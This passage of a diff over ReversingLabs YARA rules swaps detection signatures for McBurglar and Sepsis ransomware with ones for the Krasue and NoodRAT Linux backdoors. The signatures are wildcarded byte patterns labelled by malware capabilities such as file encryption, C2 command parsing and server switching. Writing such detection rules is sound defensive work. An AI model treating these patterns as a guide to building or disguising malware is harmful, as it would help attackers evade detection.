C7 84 24 ?? ?? 00 00 + ?? ?? 66 C7 84 24 ?? ?? 00 00 ?? ?? E8 ?? ?? ?? ?? 48 89 D9 8B 01 48 83 C1 ?? 8D 90 + ?? ?? ?? ?? F7 D0 21 C2 81 E2 ?? ?? ?? ?? 74 ?? 89 D0 C1 E8 ?? F7 C2 ?? ?? ?? ?? 0F + 44 D0 48 8D 41 ?? 48 0F 44 C8 00 D2 48 83 D9 ?? 48 29 D9 48 8D 84 0C ?? ?? ?? ?? 48 + 8D 8C 24 ?? ?? ?? ?? 66 C7 00 ?? ?? 66 C7 40 ?? ?? ?? 48 89 CB 8B 13 48 83 C3 ?? 8D + 82 ?? ?? ?? ?? F7 D2 21 D0 25 ?? ?? ?? ?? 74 ?? 89 C2 48 8D 7C 24 ?? BE ?? ?? ?? ?? + C1 EA ?? A9 ?? ?? ?? ?? 0F 44 C2 48 8D 53 ?? 48 0F 44 DA 00 C0 48 83 DB ?? 48 29 CB + E8 ?? ?? ?? ?? 8B 44 24 ?? 48 8D BC 24 ?? ?? ?? ?? 48 89 EE 89 84 24 ?? ?? ?? ?? 0F + B7 44 24 ?? 66 89 84 24 ?? ?? 00 00 E8 ?? ?? ?? ?? 48 8D 7D ?? 48 8D 74 24 ?? E8 ?? + ?? ?? ?? 41 83 BC 24 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2 B9 ?? ?? + ?? ?? 83 C3 ?? C1 FA ?? F7 F9 8D 42 ?? 66 C1 C8 ?? 66 89 84 24 ?? ?? 00 00 E8 ?? ?? + ?? ?? 31 D2 48 8D B4 24 ?? ?? ?? ?? 31 C9 F7 35 ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 49 89 + E0 44 89 EF 89 D2 8B 04 95 ?? ?? ?? ?? 48 63 D3 89 44 24 ?? E8 ?? ?? ?? ?? 49 83 84 + 24 ?? ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 74 ?? BF ?? ?? ?? ?? E8 } condition: - uint16(0)==0x5A4D and ($main_routine) and ( all of ($search_files_p*)) and ($encrypt_files) + uint32(0)==0x464C457F and ((( all of ($collect_system_information_32_p*)) and ($send_system_info_32) and ($parse_c2_commands_32) and ( all of ($dns_flood_32_p*))) or (( all of ($collect_system_information_64_p*)) and ($send_system_info_64) and ($parse_c2_commands_64) and ( all of ($dns_flood_64_p*)))) } -rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Mcburglar : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Linux_Backdoor_Krasue : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects McBurglar ransomware." + description = "Yara rule that detects Krasue backdoor." author = "ReversingLabs" - id = "11816401-87c3-5aff-b161-da0fa4eb4bca" - date = "2021-09-27" - modified = "2021-09-27" + id = "3187eebf-ef70-585f-85cf-5813025c785e" + date = "2024-03-04" + modified = "2024-03-04" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/ByteCode.MSIL.Ransomware.McBurglar.yara#L1-L75" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "57fefcdc1528fc1c8da36a431cd09774e33ea08a394ac4f8d19a27504e72676d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/backdoor/Linux.Backdoor.Krasue.yara#L1-L127" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "e2daa35ef9e0793062c9fb3bd8e4838e1e81ee3d228d8117b1c3b0e72eb8e151" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "McBurglar" + tc_detection_type = "Backdoor" + tc_detection_name = "Krasue" tc_detection_factor = 5 importance = 25 strings: - $setup_env = { - 00 7E ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? - ?? 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 7E ?? ?? ?? - ?? 1B 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? - ?? 00 7E ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 00 28 ?? ?? - ?? ?? 00 2A + $switch_server = { + 8B 05 ?? ?? ?? ?? FF C0 3B 05 ?? ?? ?? ?? 89 05 ?? ?? ?? ?? 7C ?? C7 05 ?? ?? ?? ?? + ?? ?? ?? ?? 48 63 05 ?? ?? ?? ?? 85 C0 75 ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B + 15 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? C6 05 ?? ?? ?? ?? + ?? 89 15 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 66 89 15 ?? ?? 23 00 48 8B 04 C5 ?? ?? ?? ?? + 66 C7 05 ?? ?? 23 00 ?? ?? 8B 10 89 15 ?? ?? ?? ?? 66 8B 40 ?? 66 89 05 ?? ?? 23 00 + C3 } - $encrypt_files_p1 = { - 00 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 2B ?? 73 ?? ?? ?? ?? 0B 07 12 ?? 28 ?? ?? ?? ?? - 7D ?? ?? ?? ?? 00 07 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 - 00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 2A + $get_hostname = { + 41 55 41 54 31 F6 55 53 31 C0 BF ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 + C0 0F 88 ?? ?? ?? ?? 48 89 E6 89 C7 89 C3 E8 ?? ?? ?? ?? 48 8B 6C 24 ?? 45 31 C9 31 + FF 41 89 D8 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 41 89 EC 48 63 ED 48 89 EE E8 ?? ?? ?? ?? + BE ?? ?? ?? ?? 48 89 C7 49 89 C5 E8 ?? ?? ?? ?? 83 F8 ?? 74 ?? 48 63 D0 49 8D 74 15 + ?? 8D 50 ?? 48 63 D2 44 39 E2 41 89 D0 7D ?? 48 FF C2 41 80 7C 15 ?? ?? 75 ?? 44 89 + C1 41 FF C8 BA ?? ?? ?? ?? 29 C1 4D 63 C0 48 89 D7 83 E9 ?? 48 63 C9 F3 A4 41 C6 80 + ?? ?? ?? ?? ?? 4C 89 EF 48 89 EE E8 ?? ?? ?? ?? 89 DF E8 ?? ?? ?? ?? 48 81 C4 ?? ?? + ?? ?? 5B 5D 41 5C 41 5D C3 } - $encrypt_files_p2 = { - 00 28 ?? ?? ?? ?? 0A 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 18 73 ?? ?? ?? ?? 0B 73 ?? ?? ?? - ?? 0C 28 ?? ?? ?? ?? 03 6F ?? ?? ?? ?? 0D 73 ?? ?? ?? ?? 13 ?? 11 ?? 20 ?? ?? ?? ?? 6F - ?? ?? ?? ?? 00 11 ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 11 ?? 18 6F ?? ?? ?? ?? 00 09 06 - 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? - ?? 6F ?? ?? ?? ?? 00 11 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? - ?? 00 11 ?? 1A 6F ?? ?? ?? ?? 00 07 06 16 06 8E 69 6F ?? ?? ?? ?? 00 07 11 ?? 6F ?? ?? - ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 02 19 73 ?? ?? ?? ?? 13 ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ?? - 13 ?? 00 2B ?? 00 11 ?? 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 11 ?? 16 11 ?? 8E 69 - 6F ?? ?? ?? ?? 25 13 ?? 16 FE 02 13 ?? 11 ?? 2D ?? 11 ?? 6F ?? ?? ?? ?? 00 00 DE ?? 13 - ?? 00 72 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 DE ?? DE - ?? 00 11 ?? 6F ?? ?? ?? ?? 00 07 6F ?? ?? ?? ?? 00 00 DC 2A + $start_server_p1 = { + 41 57 41 56 31 D2 41 55 41 54 BE ?? ?? ?? ?? 55 53 89 FB BF ?? ?? ?? ?? 48 81 EC ?? + ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 89 05 ?? ?? ?? ?? 79 ?? 83 CF ?? E9 ?? ?? ?? ?? 48 8D + 4C 24 ?? 41 B8 ?? ?? ?? ?? BE ?? ?? ?? ?? BA ?? ?? ?? ?? 89 C7 C7 44 24 ?? ?? ?? ?? + ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 31 C0 B9 ?? ?? ?? ?? 48 89 D7 F3 AB 31 FF 66 C7 05 + ?? ?? 23 00 ?? ?? E8 ?? ?? ?? ?? 0F B7 FB 89 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 3D ?? + ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 66 89 05 ?? ?? 23 00 E8 ?? ?? ?? ?? 85 C0 78 + ?? 4C 8D A4 24 ?? ?? ?? ?? 4C 8D AC 24 ?? ?? ?? ?? 4C 8D 74 24 ?? C7 05 ?? ?? ?? ?? + ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 31 C9 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? BA ?? ?? ?? + ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 48 89 C3 0F 88 ?? ?? ?? ?? 31 C0 B9 ?? ?? ?? + ?? 4C 89 E7 83 FB ?? F3 AB 7E ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? + ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 44 8D 08 31 C9 BA + ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 83 FB ?? 75 ?? BE ?? ?? ?? ?? 4C 89 + E7 E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 05 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 89 05 + ?? ?? ?? ?? E9 ?? ?? ?? ?? 89 DA BE ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 4C 89 E6 89 + C2 8A 06 89 F5 44 29 E5 3C ?? 75 ?? 80 7E ?? ?? 75 ?? 48 83 C6 ?? EB ?? 3C ?? 75 ?? + 80 7E ?? ?? 75 ?? 41 B8 ?? ?? ?? ?? 31 C0 B9 ?? ?? ?? ?? 4C 89 C7 4C 8B 05 ?? ?? ?? + ?? F3 AB 8B 7E ?? 66 8B 4E ?? 4C 89 06 C6 06 ?? 45 31 C0 C6 46 ?? ?? BE } - $find_files = { - 00 00 02 28 ?? ?? ?? ?? 0A 00 06 0C 16 0D 2B ?? 08 09 9A 13 ?? 00 11 ?? 28 ?? ?? ?? ?? - 00 00 09 17 58 0D 09 08 8E 69 32 ?? 02 28 ?? ?? ?? ?? 0B 00 07 13 ?? 16 13 ?? 2B ?? 11 - ?? 11 ?? 9A 13 ?? 00 11 ?? 28 ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32 - ?? 00 DE ?? 26 00 00 DE ?? 2A + $start_server_p2 = { + 66 C7 05 ?? ?? 23 00 ?? ?? 89 3D ?? ?? ?? ?? 66 89 0D ?? ?? 23 00 89 3D ?? ?? ?? ?? + 66 89 0D ?? ?? 23 00 48 89 F7 B9 ?? ?? ?? ?? 4C 89 E6 F3 AB E9 ?? ?? ?? ?? 85 ED 75 + ?? 48 63 DD BA ?? ?? ?? ?? BE ?? ?? ?? ?? 4C 01 E3 48 89 DF E8 ?? ?? ?? ?? 85 C0 75 + ?? 48 8D 7B ?? E8 ?? ?? ?? ?? 6B C0 ?? B9 ?? ?? ?? ?? BE ?? ?? ?? ?? 4C 89 EF 99 F7 + F9 31 C0 E8 ?? ?? ?? ?? EB ?? 8D 45 ?? 48 8D 54 24 ?? 48 98 85 C0 78 ?? 49 8B 0C 04 + 48 83 C2 ?? 48 83 E8 ?? 48 89 4A ?? C6 42 ?? ?? C6 42 ?? ?? EB ?? BA ?? ?? ?? ?? BE + ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 85 C0 75 ?? 48 8B 05 ?? ?? ?? ?? 89 E9 4C 89 F6 + 89 2D ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 48 89 05 ?? ?? ?? ?? B8 ?? ?? ?? ?? + 48 89 C7 F3 A4 BE ?? ?? ?? ?? 4C 89 EF E8 ?? ?? ?? ?? 31 C0 48 83 C9 ?? 4C 89 EF F2 + AE 48 89 C8 48 F7 D0 48 8D 50 ?? E9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 + DF E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 44 8B 0D ?? ?? ?? ?? 44 + 8B 3D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 89 4C 24 ?? 44 89 4C 24 ?? E8 ?? ?? ?? ?? 48 83 + EC ?? 41 89 C0 BA ?? ?? ?? ?? 8B 4C 24 ?? 4C 89 EF BE ?? ?? ?? ?? 31 C0 51 8B 0D ?? + ?? ?? ?? 41 57 53 44 8B 4C 24 ?? E8 ?? ?? ?? ?? 31 C0 48 83 C9 ?? 4C 89 EF F2 AE 48 + 83 C4 ?? 48 89 C8 48 F7 D0 48 8D 50 ?? 41 89 E8 4C 89 F1 4C 89 EE 8B 3D ?? ?? ?? ?? + E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 } - $generate_salt = { - 00 1F ?? 8D ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 00 16 0C 2B ?? 00 07 06 6F ?? ?? ?? ?? 00 - 00 08 17 58 0C 08 1F ?? FE 04 0D 09 2D ?? 00 DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? 00 DC 06 - 13 ?? 2B ?? 11 ?? 2A + $start_server_p3 = { + 85 C0 75 ?? 31 FF E8 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? + ?? 85 C0 75 ?? BF ?? ?? ?? ?? EB ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? + ?? ?? 85 C0 75 ?? BF ?? ?? ?? ?? EB ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? + ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 41 89 C7 E8 ?? ?? ?? ?? 45 85 FF 0F + 85 ?? ?? ?? ?? 48 8D 7C 24 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 41 89 C4 75 ?? 8B + 7C 24 ?? E8 ?? ?? ?? ?? 8B 7C 24 ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 7C 24 ?? BE ?? + ?? ?? ?? E8 ?? ?? ?? ?? 8B 7C 24 ?? E8 ?? ?? ?? ?? 48 8D 4B ?? 45 31 C0 BA ?? ?? ?? + ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 7C 24 ?? E8 + ?? ?? ?? ?? 8B 7C 24 ?? 48 8D B4 24 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 + 89 C3 7E ?? 4C 8D AC 24 ?? ?? ?? ?? 8D 04 2B 3D ?? ?? ?? ?? 7E ?? 8B 3D ?? ?? ?? ?? + BA ?? ?? ?? ?? 48 8D 4C 24 ?? 4C 89 EE 29 EA 41 89 E8 49 81 C5 ?? ?? ?? ?? 81 EB ?? + ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 8B 3D ?? ?? ?? ?? 48 8D 4C 24 ?? 41 89 E8 89 DA 4C 89 + EE E8 ?? ?? ?? ?? EB ?? 31 F6 BA ?? ?? ?? ?? 44 89 E7 E8 ?? ?? ?? ?? 85 C0 0F 85 + } + $send_encrypt = { + E8 ?? ?? ?? ?? 41 8D 7E ?? 49 89 C5 48 63 FF E8 ?? ?? ?? ?? 48 63 54 24 ?? 48 89 C7 + 4C 89 FE 48 8D 0C 13 C6 04 08 ?? 89 D1 48 01 C2 F3 A4 48 89 D7 48 89 EE 48 89 D9 44 + 89 F2 F3 A4 48 89 C6 EB ?? 8D 7B ?? 48 63 FF E8 ?? ?? ?? ?? 89 DA 49 89 C5 48 89 EE + 4C 89 EF E8 ?? ?? ?? ?? 44 8B 0D ?? ?? ?? ?? 4C 89 EE 44 89 E7 48 63 D0 41 B8 ?? ?? + ?? ?? 31 C9 E8 ?? ?? ?? ?? 48 83 C4 ?? 5B 5D 41 5C 41 5D 41 5E 41 5F C3 + } + $notify_server = { + 48 81 EC ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 48 89 E0 85 D2 7E ?? BE ?? ?? ?? ?? 89 D1 48 + 89 E7 F3 A4 48 63 D2 BE ?? ?? ?? ?? B9 ?? ?? ?? ?? 4C 8D 04 10 41 B9 ?? ?? ?? ?? 48 + 83 C2 ?? 4C 89 C7 41 B8 ?? ?? ?? ?? F3 A4 8B 3D ?? ?? ?? ?? 48 89 C6 E8 ?? ?? ?? ?? + 8B 05 ?? ?? ?? ?? 89 05 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3 } condition: - uint16(0)==0x5A4D and ($setup_env) and ($find_files) and ($generate_salt) and ( all of ($encrypt_files_p*)) + uint32(0)==0x464C457F and ($switch_server) and ($get_hostname) and ( all of ($start_server_p*)) and ($send_encrypt) and ($notify_server) } -rule REVERSINGLABS_Win32_Ransomware_Sepsis : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Linux_Backdoor_Noodrat : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects Sepsis ransomware." + description = "Yara rule that detects NoodRAT backdoor." author = "ReversingLabs" - id = "0c26d6e0-1d64-5f47-8e21-6710a531bc74" - date = "2020-07-15" - modified = "2020-07-15" + id = "ac5eae27-dc42-5060-b639-c23c0bbabb50" + date = "2024-08-26" + modified = "2024-08-26" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Sepsis.yara#L1-L126" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "171ad074a780b45195c6e02b111b3883c58a4028e635c4d6b8ce27c5e05e35d7" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/backdoor/Linux.Backdoor.NoodRAT.yara#L1-L162" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2ec4a8ba7428054edb4dcdb6a00015b9758badf515f2c210bb946ba5402674d2" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Sepsis" + tc_detection_type = "Backdoor" + tc_detection_name = "NoodRAT" tc_detection_factor = 5 importance = 25 strings: - $search_files_1 = { - 55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 8B 5D ?? 8D 84 24 ?? ?? ?? ?? 56 57 8B 3D ?? - ?? ?? ?? 68 ?? ?? ?? ?? 53 50 FF D7 8D 44 24 ?? 50 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? - ?? ?? ?? 8D 4C 24 ?? 89 44 24 ?? 51 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 - } - $search_files_2 = { - 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 - ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? - ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 - 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 - ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? - ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 - 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 74 ?? 68 ?? ?? ?? - ?? 8D 44 24 ?? 50 FF D6 85 C0 74 ?? F6 44 24 ?? ?? 8D 44 24 ?? 50 53 8D 84 24 ?? ?? - ?? ?? 50 74 ?? FF D7 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? EB ?? FF D7 8D 44 24 ?? - 50 FF 15 ?? ?? ?? ?? 8B D0 8D 7A - } - $search_files_3 = { - 66 8B 0A 83 C2 ?? 66 85 C9 75 ?? 2B D7 D1 FA 83 FA ?? 75 ?? 66 83 78 ?? ?? 74 ?? 8D - 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8D 44 24 ?? 50 FF 74 24 ?? FF 15 - ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5F 5E 33 C0 5B 8B - E5 5D C2 + $change_name_on_system_p1 = { + 41 56 41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 48 89 FB 48 8D BC 24 ?? ?? ?? ?? B8 ?? + ?? ?? ?? B9 ?? ?? ?? ?? F3 48 AB 48 8D BC 24 ?? ?? ?? ?? B1 ?? F3 48 AB C6 84 24 ?? + ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? + C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? + ?? ?? ?? ?? 80 3D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 0F B7 15 + ?? ?? ?? ?? 66 89 55 ?? 4C 8D 65 ?? 0F B7 D2 BE ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? + 48 8D 94 24 ?? ?? ?? ?? 0F B7 75 ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? + 4C 89 E6 48 89 EF E8 ?? ?? ?? ?? 4C 8B 03 48 C7 C6 ?? ?? ?? ?? 4C 89 C7 B8 ?? ?? ?? + ?? 48 89 F1 F2 AE 48 F7 D1 48 8D 14 31 48 89 EF 48 89 F1 F2 AE 48 89 CE 48 F7 D6 48 + 83 EE ?? 48 39 F2 72 ?? BE ?? ?? ?? ?? 4C 89 C7 E8 ?? ?? ?? ?? 48 89 EE 48 8B 3B E8 + ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? B9 + ?? ?? ?? ?? F3 48 AB 48 8D BC 24 ?? ?? ?? ?? B1 ?? F3 48 AB C6 84 24 ?? ?? ?? ?? ?? + C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? + ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? + C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? + ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? + C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? + ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 48 8D B4 24 ?? ?? ?? ?? + 48 8D BC 24 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C2 B8 ?? ?? ?? ?? 48 85 + D2 0F 8E ?? ?? ?? ?? 48 C7 C2 ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? 48 89 D1 F2 AE 48 } - $search_files_4 = { - 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 - ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? - ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 - 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 - ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? - ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 - 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? - 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 - ?? 50 FF D6 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 74 ?? F6 44 24 ?? - ?? 8D 44 24 ?? 50 53 8D 84 24 ?? ?? ?? ?? 50 74 ?? FF D7 8D 84 24 ?? ?? ?? ?? 50 E8 - ?? ?? ?? ?? EB ?? FF D7 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 8B D0 8D 7A ?? 66 8B 0A 83 - C2 ?? 66 85 C9 75 ?? 2B D7 D1 FA 83 FA ?? 75 ?? 66 83 78 ?? ?? 74 ?? 8D 8C 24 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8D 44 24 ?? 50 FF 74 24 ?? FF 15 ?? ?? ?? ?? - 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5F 5E 33 C0 5B 8B E5 5D C2 + $change_name_on_system_p2 = { + 89 CB 48 8D BC 24 ?? ?? ?? ?? 48 89 D1 F2 AE F7 D3 8D 5C 0B ?? 85 DB B8 ?? ?? ?? 